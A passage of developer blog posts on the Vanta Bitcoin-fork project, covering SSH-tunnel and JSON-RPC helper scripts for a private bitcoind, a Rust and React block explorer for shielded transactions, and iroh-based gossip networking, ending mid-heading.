The answer that landed in commit [`e624a8e7`](https://github.com/Dax911/vanta/commit/e624a8e70) on 2026-04-17 — `desktop: scripts for BTC RPC tunnel + address watcher + rpc helper` — is three tiny shell scripts that forward a remote `bitcoind`'s RPC port to localhost over an SSH jump host, then wrap the JSON-RPC calls so the swap CLI can speak to a real mainnet node from any laptop.

This post walks the three scripts, explains why they're written the way they are, and ends with an unkind paragraph about the alternative (just exposing port 8332 directly).

## The scripts

There are three of them, all in [`vanta/vanta-desktop/scripts/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop/scripts):

- [`btc-tunnel.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh) — set up / tear down / probe the SSH tunnel
- [`btc-rpc.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-rpc.sh) — make a single JSON-RPC call to the tunneled node
- [`btc-watch.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-watch.sh) — poll an address for state changes, with auto-reconnect

They are all `bash`, all `set -euo pipefail`, all under 100 lines. Code that looks like 1995. That's the right tool for what they do.

## btc-tunnel.sh: the SSH-jump forward

The architecture: my laptop sits on whatever Wi-Fi I'm on. The `bitcoind` runs at `10.0.1.89` on my home LAN. I can't reach `10.0.1.89` from a coffee shop. I can reach a public-facing jump host (a small VPS on a port I won't share publicly), and the jump host can reach the LAN.

`ssh -J jump@public:port lan-host` does the routing. `ssh -L 8332:127.0.0.1:8332 lan-host` does the port forward. Combine them, daemonise the connection with `-f -N -M`, point a control socket at `/tmp/btc-tunnel.sock`, and you have a process you can `up`/`down`/`status` against from any shell.

The full flag set, [from the script](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh):

```bash
ssh_args=(
  -o StrictHostKeyChecking=accept-new
  -o IdentitiesOnly=yes
  -o ServerAliveInterval=30
  -o ServerAliveCountMax=3
  -o ExitOnForwardFailure=yes
  -i "$BTC_TUNNEL_KEY"
  -J "${JUMP_USER}@${JUMP_HOST}:${JUMP_PORT}"
  -L "${BTC_LOCAL_PORT}:127.0.0.1:${BTC_TUNNEL_RPC_PORT}"
  -S "$SOCKET"
)
```

Five of these flags are load-bearing. Let me unpack them.

**`StrictHostKeyChecking=accept-new`.** This is the "trust on first use" mode. It accepts a new host key on first connection but refuses any later mismatch. The strict-no setting (`yes`) would require pre-populating known_hosts; the strict-no-yes setting (`no`) would silently accept any host key including a man-in-the-middle. `accept-new` is the right middle ground for an interactive dev tool.

**`IdentitiesOnly=yes`.** Tells SSH to use *only* the key passed in `-i`, not whatever else is in `~/.ssh/`. Without this, SSH will try every key in your agent, exhaust the server's `MaxAuthTries`, and fail with a confusing error.

**`ServerAliveInterval=30` + `ServerAliveCountMax=3`.** Keep-alive every 30 seconds, kill the connection after 3 missed responses. A residential ISP will silently drop idle connections; this keeps the tunnel up for hours of intermittent use.

**`ExitOnForwardFailure=yes`.** If the local port bind fails — say something else is on `:8332` already — exit immediately rather than maintaining a half-broken tunnel that can't actually carry traffic. The default behavior (silently keep the SSH connection up but not the forward) is a great way to spend twenty minutes wondering why your RPC calls hang.

**`-S "$SOCKET"`.** Control socket. Lets a *separate* `ssh` invocation send commands to the same connection (`-O check`, `-O exit`). This is what makes `is_up()` work without parsing `ps` output:

```bash
is_up() {
  ssh -S "$SOCKET" -O check "$BTC_TUNNEL_HOST" >/dev/null 2>&1
}
```

That's the whole "is the tunnel alive" check. SSH manages it; we just ask.

## btc-tunnel.sh: the RPC probe

Once the tunnel is up, the `status` command goes one step further — it actually makes an RPC call through the tunnel to verify the remote `bitcoind` is reachable and synced:

```bash
probe_rpc() {
  curl -s --max-time 5 --user "${BTC_RPC_USER}:${BTC_RPC_PASS}" \
    --data-binary '{"jsonrpc":"1.0","id":"s","method":"getblockchaininfo","params":[]}' \
    -H 'content-type:text/plain;' "http://127.0.0.1:${BTC_LOCAL_PORT}/"
}
```

The output gets parsed by an inline Python one-liner that prints the chain, block height, header height, sync state, and verification progress in one terse line. Why Python and not `jq`? Because `jq` isn't preinstalled on a fresh macOS, and Python 3 is. Portability wins over elegance here.

The `getblockchaininfo` RPC is the standard "is this node alive and what does it know" call. If it returns a coherent JSON body, the tunnel is end-to-end working. If it doesn't, you get a clear error and you know which layer to debug — the SSH connection (tunnel up but RPC dead) or the local port (tunnel down, no RPC at all).

## btc-rpc.sh: the one-shot wrapper

This one is so small it fits in the post:

```bash
wallet_scoped=0
if [ "${1:-}" = "--wallet" ]; then
  wallet_scoped=1
  shift
fi

method="${1:?method required}"
params="${2:-[]}"
path=""
[ "$wallet_scoped" = "1" ] && path="/wallet/${BTC_RPC_WALLET}"

curl -s --user "${BTC_RPC_USER}:${BTC_RPC_PASS}" \
  --data-binary "{\"jsonrpc\":\"1.0\",\"id\":\"cli\",\"method\":\"${method}\",\"params\":${params}}" \
  -H 'content-type:text/plain;' \
  "${BTC_RPC_URL}${path}" | python3 -m json.tool
```

The whole point is to give me a one-line shorthand for `bitcoind` debugging that doesn't require remembering the JSON-RPC envelope. From any shell with the tunnel up:

```bash
$ btc-rpc.sh getblockchaininfo
$ btc-rpc.sh --wallet getbalance
$ btc-rpc.sh --wallet getnewaddress '["swap-test","bech32"]'
$ btc-rpc.sh getrawtransaction '["<txid>", true]'
```

The `--wallet` flag is the difference between core RPCs (chain state, mempool) and wallet-scoped RPCs (balance, send, sign). Bitcoin Core changed the RPC URL convention in v0.18 — wallet RPCs route to `/wallet/<name>`, core RPCs route to `/`. The wrapper handles that distinction by setting `path` and concatenating it onto `BTC_RPC_URL`.

The `python3 -m json.tool` at the end is a pretty-printer. Two seconds of latency on the JSON pretty-print is the right amount of overhead for terminal readability.

## btc-watch.sh: the address watcher

This is the one I use most. When you're testing an HTLC, you fund a P2WSH output, broadcast the funding transaction, wait for it to confirm, then build the spending transaction. "Wait for it to confirm" is what `btc-watch.sh` automates:

```bash
addr="${1:?address required — see usage in header}"
log="${2:-/tmp/btc-watch.log}"

last_state=""
while true; do
  ensure_tunnel
  resp=$(rpc listunspent "[0, 9999999, [\"${addr}\"]]" || echo '{}')
  state=$(echo "$resp" | python3 -c "
import sys,json
try:
  r = json.load(sys.stdin).get('result') or []
  if not r: print('EMPTY'); sys.exit()
  parts = ['%s|%.8f|%d' % (u['txid'], u['amount'], u['confirmations']) for u in r]
  print(';'.join(sorted(parts)))
except Exception as e:
  print('ERR:'+str(e))
")
  if [ "$state" != "$last_state" ]; then
    # log + display the change
    last_state="$state"
  fi
  sleep "$BTC_WATCH_INTERVAL"
done
```

Three design choices in here that took longer than they should have to get right.

**`listunspent` with `minconf=0`.** Includes mempool. The HTLC funding transaction shows up *first* in the mempool with `confirmations=0`, then gains confirmations as blocks are mined. You want to know about both states. The default `listunspent` arguments are `[1, 9999999]` (confirmed-only); we override with `[0, 9999999, [addr]]` to include mempool and filter by address.

**State diffing.** The watcher prints when the state *changes*, not on every poll. Otherwise the log is unreadable. The state representation is `txid|amount|confirmations`, joined with `;` and sorted. Sorted because `listunspent` doesn't guarantee output order; without sorting, two consecutive polls of the same UTXO set could produce different state strings.

**`ensure_tunnel`.** Before each RPC poll, check that the tunnel's still up. If it's not, try to bring it back up:

```bash
ensure_tunnel() {
  if rpc getblockcount '[]' '' >/dev/null 2>&1; then return 0; fi
  log_line "rpc unreachable — attempting tunnel up"
  if [ -x "${HERE}/btc-tunnel.sh" ]; then
    "${HERE}/btc-tunnel.sh" up || log_line "tunnel up failed"
  else
    log_line "btc-tunnel.sh not found next to this script; cannot auto-reconnect"
  fi
  sleep 2
}
```

The script is supposed to run for hours during a long swap test. If my coffee shop's Wi-Fi drops and reconnects, the tunnel breaks. Without `ensure_tunnel`, the watcher would silently fail every 10 seconds. With it, the tunnel comes back up automatically and the polling resumes. The first time this saved me a swap test was the moment I knew the script was worth committing.

## On exposing 8332 directly

> **WARNING:** Do not put port 8332 on the public internet. Do not put it on a "VPN-only" subnet that you can't audit. Do not assume rate-limiting at your router is enough.

If you read tutorials online — I have, you have, we all have — you'll find advice that says "just expose your bitcoind RPC port through your router." This is bad advice, and I'm going to be direct about why.

The bitcoind RPC exposes wallet operations behind HTTP basic auth. If `RPCPASSWORD` ever leaks (in a CI log, in a screenshot, in a `.env` file in a git history, in a commit message) the attacker has full access to your wallet. They can sign transactions. They can drain your funds. There is no "I locked my wallet" safety net here — the unlock is part of the same RPC and it accepts a passphrase that can also be brute-forced once the connection is open.

Even with no wallet, the RPC exposes call patterns that can be used to fingerprint your node, drain its mempool data, and probe for vulnerabilities. Bitcoin Core has a hardening guide for a reason.

The SSH tunnel architecture solves all of this in one move. The RPC port is bound to `127.0.0.1` on the bitcoind host. The only path to it is over an authenticated SSH connection. The jump host doesn't see the RPC traffic — it sees only the encrypted SSH stream. Your laptop talks to the jump host using key-based auth (the `IdentitiesOnly` flag). The RPC password lives in `.env.local` and never leaves your machine.

If your authoring environment doesn't have an SSH-jump architecture *available*, the second-best is to run a separate `bitcoind` on `regtest` mode, just for the development workflow. Mainnet RPC should not be on a public IP. Ever.

## Pulling it together: a swap test

The end-to-end swap-test flow looks like this, on a fresh terminal:

```bash
# 1. Bring up the tunnel.
$ ./btc-tunnel.sh up
tunnel up: 127.0.0.1:8332 -> dax@10.0.1.89:8332

# 2. Sanity check.
$ ./btc-tunnel.sh status
forward: 127.0.0.1:8332 -> dax@10.0.1.89:8332
chain=main blocks=874632 headers=874632 synced=True progress=1.000000

# 3. Generate a fresh receiving address for the swap.
$ ./btc-rpc.sh --wallet getnewaddress '["swap-test","bech32"]'
"bc1qjh9pjnqs5486d08yg4aafdlphwl3rc6ls0lf7w"

# 4. Start watching the address in another window.
$ ./btc-watch.sh bc1qjh9pjnqs5486d08yg4aafdlphwl3rc6ls0lf7w &

# 5. Run the swap CLI from a third window.
$ vanta-swap participate --amount 0.001 --hash <h> ...
```

The watcher logs the funding transaction the moment it hits the mempool, and again every time it gains a confirmation. The CLI broadcasts the spending transaction. The watcher logs the spend.

That whole loop takes about 30 seconds end to end on a happy mainnet. Without the tunnel scripts, it'd take twenty minutes per iteration of fumbling with `bitcoin-cli` arguments and SSH commands.

## What I changed my mind about

I wrote the first version of `btc-tunnel.sh` as a one-liner pasted into Notion. It worked. I copy-pasted it dozens of times before I realised that `ssh` would silently exit if the home host was momentarily unreachable, leaving me typing into a tunneled port that wasn't listening to anything.

The version that ships does three things the one-liner didn't: it uses a control socket so `is_up` is reliable, it sets `ExitOnForwardFailure` so the script crashes loudly instead of looking up, and it has a `restart` subcommand because manually re-running `up` after a network drop is the kind of friction that makes you stop using the tool.

The general lesson — and this is the kind of thing I'd put in a "scripts I keep around" post — is that the dev tools you use *daily* deserve the same care you give production code. Not the same test coverage. But the same observability. A 60-line bash script with `set -euo pipefail`, control sockets, and a clear `status` mode is a different beast from a 60-line bash script that just `ssh`s and prays.

## Further reading

- [`vanta/vanta-desktop/scripts/btc-tunnel.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-tunnel.sh) — the tunnel script
- [`vanta/vanta-desktop/scripts/btc-rpc.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-rpc.sh) — the RPC wrapper
- [`vanta/vanta-desktop/scripts/btc-watch.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/scripts/btc-watch.sh) — the address watcher
- [Bitcoin Core's `bitcoin.conf` reference](https://github.com/bitcoin/bitcoin/blob/master/doc/bitcoin-conf.md) — every flag in the default config
- [BIP-199 by hand](/blog/vanta_swap_htlc_walkthrough/) — the swap CLI these scripts support
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the dev workflow these scripts plug into


---

# Block explorers for privacy chains: a Rust indexer for vanta

Canonical: https://blog.skill-issue.dev/blog/vanta_explorer_rust_indexer/
Description: Patching btc-rpc-explorer got us to 'works.' Then we wrote vanta-explorer in Rust + React: an Axum backend, SQLite indexer, and a SPA that renders shielded transfers as opaque commitments without lying about what it knows.
Published: 2026-04-13T17:34:24.000Z
Tags: vanta, rust, explorer, axum, react, privacy


When you're forking Bitcoin Core, you can't get away with not having a block explorer. People will ask you for one within hours of finding out the chain exists. So Vanta has had two: the [patched `btc-rpc-explorer`](https://github.com/Dax911/vanta/tree/main/explorer) (Node.js, the original "works in a weekend" answer) and the from-scratch [`vanta-explorer`](https://github.com/Dax911/vanta/tree/main/vanta-explorer) (Rust + React, the "actually models a privacy chain correctly" answer). This post is about how we got from one to the other.

The interesting question isn't "how do you write an explorer" — that's well-trodden — it's "how do you write a *privacy* explorer that displays opaque commitments without misrepresenting what it knows."

## Phase one: patch btc-rpc-explorer

The first explorer was a 5-day patch on top of [`janoside/btc-rpc-explorer`](https://github.com/janoside/btc-rpc-explorer). The diff is in [`explorer/`](https://github.com/Dax911/vanta/tree/main/explorer) and the work was mostly: rename strings (`bitcoin` → `vanta` everywhere), swap currency labels (BTC → VANTA, sat → zat), point at `vantad` instead of `bitcoind`, fix the mining-template URL, and update the favicon.

The 2026-04-13 commit log shows the rebrand pass:

```
de8efe0b explorer: rebrand patches zeracoin -> vanta
```

This explorer is Node.js, ships a multi-megabyte `node_modules`, and rendered transactions as transparent UTXOs because that's what its templates are built for. Witness v2 commitments showed up in the UI as `value: 0.0` outputs of type `witness_unknown`, which is technically accurate but extremely useless. A user looking at our chain through this explorer saw transactions and concluded "all the value is in coinbase outputs." Wrong, *but the explorer wasn't lying* — it was just showing what its model of "transaction" knew how to show. The real value lived in commitments outside its model.

## Phase two: write a Rust explorer

I started [`vanta-explorer/`](https://github.com/Dax911/vanta/tree/main/vanta-explorer) on 2026-04-13 (`2db4e060 explorer: scaffold vanta-explorer (Rust backend + React web)`). The pitch was "an explorer that knows what a witness v2 commitment is, doesn't pretend transparent volume is the only volume, and gives me a tool I can extend without fighting a Node.js codebase that wasn't designed for it."

The shape:

- **Backend** ([`vanta-explorer/backend`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend)) — Rust, Axum 0.7, SQLite via `sqlx`, polls `vantad` and `vanta-node` on intervals. Serves `/api/*`.
- **Web** ([`vanta-explorer/web`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/web)) — React + Vite + Tailwind. Recharts for hashrate/throughput. SPA with React Router. Runs as static assets served by the Axum backend on the same port.
- **Indexer modules**: `l1_poller`, `l2_poller`, `mempool_poller`, `pool_poller`. Each is a tokio task that pulls its source on a fixed interval and writes to SQLite.
- **API modules**: `blocks`, `tx`, `address`, `mempool`, `network`, `pool`, `proofs`, `anon`, `l2`, `search`, `tip`, `sse`. Each is its own axum router section.

The full backend `Cargo.toml`:

```toml
[dependencies]
axum = { version = "0.7", features = ["macros"] }
tokio = { version = "1", features = ["full"] }
tower-http = { version = "0.6", features = ["cors", "trace", "compression-br", "fs"] }
sqlx = { version = "0.8", features = ["runtime-tokio", "sqlite", "macros", "migrate", "chrono"] }
reqwest = { version = "0.12", features = ["json", "rustls-tls"], default-features = false }
serde = { version = "1", features = ["derive"] }
chrono = { version = "0.4", features = ["serde"] }
async-stream = "0.3"
```

Reqwest with `rustls-tls` to skip the OpenSSL dependency. SQLite with chrono support so timestamps are `DateTime<Utc>` end-to-end. `async-stream` for SSE — we ship server-sent events for live tip updates so the explorer's homepage updates within a second of a new block.

The startup is the canonical four-task pattern:

```rust
indexer::spawn_all(state.clone());

let app = api::router(state);

let listener = TcpListener::bind(&bind_addr).await?;

tokio::select! {
    res = axum::serve(listener, app) => { res?; }
    _ = shutdown_signal() => {
        info!("shutdown requested, exiting");
        std::process::exit(0);
    }
}
```

The `std::process::exit(0)` on shutdown is a deliberate cheat. Background pollers and SSE streams are infinite loops; the tokio runtime drop blocks waiting for them to finish, which they never do. Calling exit explicitly when the user hits Ctrl-C makes the explorer shut down in milliseconds instead of however long the runtime decides to wait. Not pretty; it works.

## How shielded transfers are rendered

Here's the part I want to be precise about. From the [executive-summary paper](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md):

> Every non-coinbase witness v2 output carries `nValue = 0` on L1; the real amount lives inside the note commitment preimage and is never observable on the public ledger.

The explorer can read every transaction in every block, but it cannot read amounts on shielded outputs. That's the whole point. So the question for a privacy-explorer designer is: *what does the user see?*

Three options were on the table.

**Option A: lie.** Pretend the output value is what `getrawtransaction` returns (zero) and label it "0 VANTA." Technically accurate, deeply misleading.

**Option B: hide.** Don't show shielded transactions at all. Filter them out of the block view. Cowardly; users can read the raw RPC and see them.

**Option C: render the commitment as the artefact.** Show the transaction. Show its inputs and outputs as opaque commitments — 32-byte hex strings that are *what the chain knows*. Show that the proof verified. Don't pretend to know more than that.

We picked C. The 2026-04-16 commit `c912fc04 explorer: ZK transfers first-class + genesis scan + proof verification` is when this work landed. The `proofs` API endpoint pulls from `vanta-node`'s 500-slot proof event ring buffer (the one the [zkvm engineering paper](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) describes) and the explorer renders each verified proof with the public-input slots: SMT root, input commitments, nullifiers, output commitments, signed `value_balance`.

A user looking at a shielded transaction sees:

- the transaction's L1 outputs (mostly `nValue = 0` witness v2 commitments + maybe an OP_RETURN anchor)
- a "ZK proof verified" badge
- the public inputs from the proof, byte-accurately
- the SMT root the proof was verified against
- the nullifier (so they can confirm the spend isn't replayed)

That's the whole story the chain has for that transaction. The explorer isn't hiding anything; it's rendering the right artefact.

## The L2 poller

[`indexer/l2_poller.rs`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend/src/indexer) is the module that talks to `vanta-node` instead of `vantad`. It polls the L2 sidecar's REST API on a configurable interval and pulls:

- `/status` for SMT root + commitment count + nullifier count
- `/proofs/recent` for the proof event ring buffer
- per-commitment lookup as the explorer's UI deep-links into specific notes

The explorer never tries to *decrypt* notes. The encrypted-note inbox at `vanta-node` is for wallets, not for explorers — only the recipient's secret key can decrypt. The explorer's job is to render the public artefacts and link them.

Pool stats come from the `pool_poller` against the public-pool's NestJS API (the 2026-04-13 commit `dbe62058 explorer: map real public-pool NestJS shape for /api/pool` is when that contract got nailed down). The explorer's pool page shows aggregate hashrate, recent shares, and recent block finds — it's a separate data source from L1 because the pool tracks shares and miners, not chain state.

## The polish pass

A bunch of small commits in mid-April were polish:

- `6c374159 explorer: populate l1_txs + real TxDetail` — moved transaction-detail rendering from a placeholder to actual chain data
- `30fe0a04 explorer: persist pool metrics + historic hashrate chart` — historic hashrate via SQLite-backed time-series
- `600d2a03 explorer: code-split recharts via React.lazy` — Recharts is large; lazy-load it so the homepage stays fast
- `96333d42 explorer: client-side Merkle verify tool` — let users paste a transaction id and a Merkle root and verify inclusion locally, without the explorer
- `22698e6e explorer: phase 9 polish + fast backend shutdown` — the `std::process::exit` shutdown trick above

Each of these is a half-day of work. The explorer is *eternal* polish — there's always one more chart, one more endpoint, one more responsive-layout tweak. I'm choosing to call it done at "users can navigate from a transaction to its proof to its L2 commitment to its receiving address."

## What I would do differently

1. **Don't start with the patched explorer at all.** It got us to "we have an explorer" in three days, which mattered for the launch story. But the eventual full rewrite was inevitable. If I were doing this again I'd skip phase one and accept a one-week longer runway to launch.
2. **Push more rendering to the client.** The explorer renders most pages server-side and ships HTML. A more aggressive split (server is *only* the API, client is *all* of the rendering) would simplify the backend further. The current setup is fine; it could be cleaner.
3. **Move the SQLite into a real time-series database.** SQLite is lovely for the indexed transactional data, but pool metrics + historic hashrate + mempool depth want a TSDB-shaped store (downsampling, retention policies, etc.). On the list, not urgent.

## What I changed my mind about

I started building this thinking the privacy aspect would be the hardest part — that getting the UI to render commitments correctly without leaking would be a design conversation. It wasn't. The hardest part was the *boring stuff*: making the SQLite indexer fast enough to keep up with 1-minute blocks while also catching up from a cold start; making React Router not lose its mind when a deep-link lands on a page whose data isn't loaded yet; making the homepage's hashrate chart not janky.

The privacy rendering, once we'd decided on Option C, was code. The rest of the explorer is the kind of work that explorers always are.

## Further reading

- [`vanta-explorer/backend`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/backend) — the Rust + Axum + SQLite indexer
- [`vanta-explorer/web`](https://github.com/Dax911/vanta/tree/main/vanta-explorer/web) — the React + Vite SPA
- [`explorer/`](https://github.com/Dax911/vanta/tree/main/explorer) — the original patched btc-rpc-explorer
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the L2 the explorer reads from
- [`janoside/btc-rpc-explorer`](https://github.com/janoside/btc-rpc-explorer) — the upstream we forked for phase 1


---

# iroh in production: encrypted-note gossip on a 1-minute-block chain

Canonical: https://blog.skill-issue.dev/blog/vanta_iroh_gossip_in_production/
Description: Why vanta-node uses iroh-gossip for L2 P2P instead of libp2p, what the topic + ALPN setup actually looks like, the GossipMessage shape, and the saturating-decrement bug that taught me an event ordering lesson.
Published: 2026-04-13T17:46:02.000Z
Tags: vanta, iroh, p2p, gossip, rust, quic, l2


import { Mermaid, Sandbox, TradeoffTable, Quote, Aside } from "@/components/mdx";

The L2 sidecar [I wrote about previously](/blog/vanta_sidecar_architecture/) has four jobs: watch L1, serve a REST API, snapshot state, and gossip with peers. The first three are well-trod tokio-task territory. The fourth is the one that actually matters for L2 decentralisation, because if every peer has to fetch encrypted notes from one REST server, that REST server is a centralisation point, and the privacy chain isn't really a privacy chain.

This post is the deep dive on the gossip layer specifically. The transport is [iroh.computer](https://iroh.computer) — a pure-Rust QUIC stack with an opinionated NAT-traversal story and a built-in gossip protocol that does most of what we need. The integration code lives in [`vanta/vanta-node/src/gossip.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs), which is where I'd point you to read first if you want the unvarnished version.

## Why iroh

The architecture doc puts the rationale tersely. From [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md):

<Quote source="doc/vanta-architecture.md">
**P2P:** iroh.computer — pure Rust, QUIC-based, NAT traversal, gossip protocol, content-addressed blobs. Chosen over libp2p for simplicity, built-in QUIC + NAT hole-punching, and document sync (useful for offline branch-and-merge).
</Quote>

That's the polite version. Let me unpack it with a tradeoff table that does *not* pull punches.

<TradeoffTable
  caption="L2 gossip transport options I actually considered"
  rows={[
    {
      option: "iroh.computer (chose this)",
      cost: "~1.5 MB extra binary; one Rust crate; fixed config",
      latency: "QUIC, per-stream ordering, hole-punching by default",
      blast_radius: "Production users at n0-computer; small but active maintainer team",
      notes: "Pure Rust. NAT-traversal-as-default is the killer feature."
    },
    {
      option: "libp2p (rust-libp2p)",
      cost: "Bigger dependency tree, more configuration, more knobs",
      latency: "Comparable on QUIC transport once configured",
      blast_radius: "IPFS, Filecoin, Polkadot — battle-tested",
      notes: "Configuration tax was the killer. We do not need yamux, mplex, mdns, AND noise + tls. We need one of each."
    },
    {
      option: "Custom yamux-over-QUIC",
      cost: "Maintenance burden of every NAT-traversal edge case",
      latency: "Whatever you implement",
      blast_radius: "Nobody else runs this",
      notes: "Reinvents NAT traversal. The interns will resent us."
    },
    {
      option: "NATS or other broker",
      cost: "A broker. Defeats the entire premise of decentralised L2.",
      latency: "Fast, but topology-dependent",
      blast_radius: "Operations matter on a single-binary chain",
      notes: "Not seriously considered. Listed for completeness."
    },
  ]}
/>

The "configuration tax" point is the one I want to underline. libp2p is in principle the right answer; we used it on an earlier prototype. The problem was that *every* libp2p deployment is a snowflake — yamux vs mplex, noise vs tls, mdns vs static seeds, gossipsub v1.0 vs v1.1 — and getting two different libp2p deployments to talk *predictably* across a real residential-NAT network was a recurring time sink.

iroh ships an opinionated default. There is one transport (QUIC), one ALPN per protocol, and one NAT-traversal story (n0-relay-assisted hole-punching). When it works it works the same way every time. When it fails, the failure modes are bounded and documented.

## Topology

The Vanta L2 gossip topology is one topic per chain, with content-addressed blob references for any payload that's too big for the gossip message-size limit (we cap at 64 KB per message, which is enough headroom for a single encrypted note plus headers).

<Mermaid chart={`flowchart LR
  subgraph Chain["Vanta L2 — single gossip topic"]
    P1[vanta-node #1<br/>Berkeley, CA]
    P2[vanta-node #2<br/>Berlin]
    P3[vanta-node #3<br/>Tokyo]
    P4[Wallet's embedded<br/>vanta-node]
  end

  P1 <-->|encrypted notes<br/>+ commitments<br/>+ nullifiers| P2
  P2 <-->|gossip| P3
  P3 <-->|gossip| P4
  P1 <-->|hole-punched| P4

  R[(N0 relay)]
  P1 -. relay if<br/>direct fails .-> R
  P4 -. relay if<br/>direct fails .-> R`}/>

Every node joins the same topic. Every message broadcast on that topic ends up at every other peer (eventually — this is gossip, not multicast, so it's `O(log N)` hops in expectation). The N0 relays are a fallback for peers behind symmetric NATs or other hole-punching-resistant boundaries; once a direct path is found, the relay drops out.

The topic is a SHA-256 of a fixed string in [`gossip.rs:42`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs):

```rust
fn vanta_topic() -> TopicId {
    use sha2::{Sha256, Digest};
    let mut hasher = Sha256::new();
    hasher.update(b"Vanta/L2/Gossip/v1");
    let hash = hasher.finalize();
    let mut bytes = [0u8; 32];
    bytes.copy_from_slice(&hash);
    TopicId::from_bytes(bytes)
}
```

`Vanta/L2/Gossip/v1`. The `v1` is intentional: when we ship a breaking change to the message format, we'll bump to `v2` and the two networks will simply not see each other. That's the cleanest cross-version migration story we have, and it's a single-line change.

## The message shape

Three message kinds, all bincode-serialised:

```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum GossipMessage {
    NewCommitment { commitment: Hash },
    NullifierRevealed { nullifier: Hash },
    EncryptedNote(EncryptedNote),
}
```

`Hash` is a 32-byte alias from `vanta_core`. `EncryptedNote` is an opaque ciphertext blob plus a recipient hint that wallets use to do trial-decryption. The ciphertext is encrypted-to-recipient-pubkey using the same envelope scheme [described in the nullifier-set post](/blog/vanta_l1_nullifier_set/) — `vanta-node` cannot decrypt a note even if it tries.

The relevant point is what's *not* here. There's no "request-response" message. There's no "inventory" or "bloom filter" or pull-based sync. iroh-gossip is broadcast-only; if a peer joins late, they catch up via the L1 watcher (which scans block history) and then receive new state via gossip going forward. Decoupling history-sync from real-time-sync is a simplification: gossip is *always* real-time, history is *always* re-derived from L1.

## The send path

Three small fan-out helpers, one private send method, in [`gossip.rs:53`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs):

```rust
impl GossipHandle {
    pub async fn broadcast_commitment(&self, commitment: Hash) -> Result<()> {
        let msg = GossipMessage::NewCommitment { commitment };
        self.broadcast(&msg).await
    }

    pub async fn broadcast_nullifier(&self, nullifier: Hash) -> Result<()> {
        let msg = GossipMessage::NullifierRevealed { nullifier };
        self.broadcast(&msg).await
    }

    pub async fn broadcast_encrypted_note(&self, enc: EncryptedNote) -> Result<()> {
        let msg = GossipMessage::EncryptedNote(enc);
        self.broadcast(&msg).await
    }

    async fn broadcast(&self, msg: &GossipMessage) -> Result<()> {
        let bytes = bincode::serialize(msg)?;
        self.sender.broadcast(Bytes::from(bytes)).await?;
        Ok(())
    }
}
```

The `GossipHandle` is `Clone` and gets passed to the API server, the L1 watcher, and the swap module. Whoever has the handle can broadcast. The handle is a wrapper around `iroh_gossip::api::GossipSender`, which is a tokio-friendly mpsc-style channel into iroh's outbound queue.

`bincode::serialize` is fine here because the message types are all simple plain-old-data with no `#[serde(skip)]` or recursion. The deserialization path (next section) is where the gotchas live.

## The receive path

`start()` in [`gossip.rs:88`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs) is the function that brings up the whole gossip stack. It does five things:

1. Build an `Endpoint` with the `presets::N0` relay configuration.
2. Spawn a `Gossip` instance with a 64 KB max-message-size.
3. Wire a `Router` that accepts inbound gossip connections on the gossip ALPN.
4. Subscribe to the Vanta topic with the user's bootstrap peer list.
5. Spawn a tokio task to drain the inbound stream into `apply_gossip_message`.

```rust
let endpoint = Endpoint::builder(presets::N0)
    .bind()
    .await?;

let gossip = Gossip::builder()
    .max_message_size(65536)
    .spawn(endpoint.clone());

let router = Router::builder(endpoint.clone())
    .accept(GOSSIP_ALPN, gossip.clone())
    .spawn();

let topic_id = vanta_topic();
let topic = gossip.subscribe(topic_id, peer_ids).await?;
let (sender, mut receiver) = topic.split();
```

The `accept(GOSSIP_ALPN, gossip.clone())` call is what tells the router "any inbound QUIC connection that negotiates the gossip ALPN gets handed to this Gossip instance." iroh multiplexes multiple protocols on one endpoint; today we only run gossip, but the same router could in principle accept blob-sync or document-sync ALPNs.

The receive loop calls `receiver.try_next()` in a tight loop and dispatches each event. There are three event types we care about:

```rust
async fn handle_gossip_event(
    state: &L2State,
    peer_counter: &std::sync::Arc<std::sync::atomic::AtomicUsize>,
    event: iroh_gossip::api::Event,
) {
    use std::sync::atomic::Ordering;
    match event {
        iroh_gossip::api::Event::Received(message) => {
            match bincode::deserialize::<GossipMessage>(&message.content) {
                Ok(msg) => apply_gossip_message(state, msg),
                Err(e) => {
                    tracing::debug!("Failed to deserialize gossip message: {e}");
                }
            }
        }
        iroh_gossip::api::Event::NeighborUp(peer_id) => {
            let n = peer_counter.fetch_add(1, Ordering::Relaxed) + 1;
            tracing::info!("Gossip peer joined: {} (now {n})", peer_id);
        }
        iroh_gossip::api::Event::NeighborDown(peer_id) => {
            peer_counter
                .fetch_update(Ordering::Relaxed, Ordering::Relaxed, |v| {
                    Some(v.saturating_sub(1))
                })
                .ok();
            let n = peer_counter.load(Ordering::Relaxed);
            tracing::info!("Gossip peer left: {} (now {n})", peer_id);
        }
        _ => {}
    }
}
```

The `_ => {}` is loud silence: iroh's Event enum has more variants than we care about (relay-state changes, lurker-mode signals) and we explicitly ignore them.

## The saturating-decrement gotcha

